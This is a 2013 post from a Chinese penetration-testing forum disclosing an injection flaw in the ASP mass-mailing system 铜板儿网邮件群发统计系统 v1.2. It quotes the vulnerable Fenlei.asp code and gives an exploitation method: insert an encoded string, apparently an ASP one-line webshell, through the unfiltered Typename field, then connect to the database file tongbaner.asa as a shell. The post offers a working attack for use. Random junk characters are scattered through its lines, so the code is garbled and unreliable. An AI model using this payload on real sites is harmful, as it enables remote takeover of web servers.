中国网络渗透测试联盟

标题: 铜板儿网邮件群发统计系统 v1.2 漏洞 [打印本页]

作者: admin    时间: 2013-3-14 20:14
标题: 铜板儿网邮件群发统计系统 v1.2 漏洞
'Fenlei.asp
6 k! [; e' K' p! Y% @$ H
8 c% j) |" L6 q* f' g: m  J2 \IF Request.QueryString("Action")="del" Then % y1 n% x% T. l- r/ M: z! L6 \- L
ID=Request.QueryString("ID")
. d) \2 S; ^4 cIF Countss ("tui","Fenlei",ID )<>0 then
7 D' ]7 ?. x# b'略
4 \1 |( z7 I, k+ ~4 _( _  WIF Request.QueryString("Action")="Add" Then 5 f! Z. h( |. A' v' d) E
Tname=Request.Form("Typename") + [/ b& k3 T8 X; J2 i
Set Rs=Server.CreateObject("adodb.Recordset")
: a6 t9 {& y. k/ s$ l7 ?% CSql="Select * From Fenlei Order by id Desc "
- Y( D. V8 y( g/ B7 |- yRs.Open Sql,Conn,1,3
5 B7 B- |) X0 I8 G; O- Q: y1 i" R. URs.Addnew 6 L5 K4 l9 @6 I' G$ p2 s* X6 N
Rs("Typename")=Tname
/ K: ]/ \% _/ j8 s  M6 g- t# a'略
9 F4 Z: P4 K* Q# P2 rSet Rs=Server.CreateObject("adodb.Recordset") / M- Y5 L' Q+ T( j) f" i
Sql="Select * From Fenlei Order by id Desc " : x+ c4 Q# w; W) \7 m6 L
Rs.Open Sql,Conn,1,1 - u# l7 U2 n& w/ g
'略
  D( z/ P. n* Y, q; w; w) Y* z%>7 i, e2 w/ g! w
2 ]8 M7 I  {4 W' K6 e$ g  d8 m

5 x. K. \$ N: F  Y/ G; W9 g7 W- R
/ K: @( _: r# K) K没有过滤,直接写入数据库。6 r5 w: D- z" n) }

+ [2 w, H. w  S/ S' |/ J9 N利用方法:
. d4 J1 ]( B- {' i: n* z, i $ s5 N8 Q0 B9 ~  ]' d
插入:┼攠數畣整爠煥敵瑳∨≡┩>6 T) c5 X9 _! o3 L6 }; `& h7 c
3 m" l% |1 S9 Q! X+ K" v- W* @
( h' V5 `5 Y3 O- n. B: D7 d
连接: http://www.xxx.com/###tongbaner.asa % V& J) d2 ?- U7 g
'默认安装文件:
; k0 b8 n$ `$ u" S'install.asp4 n/ j4 W) `% E  b





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2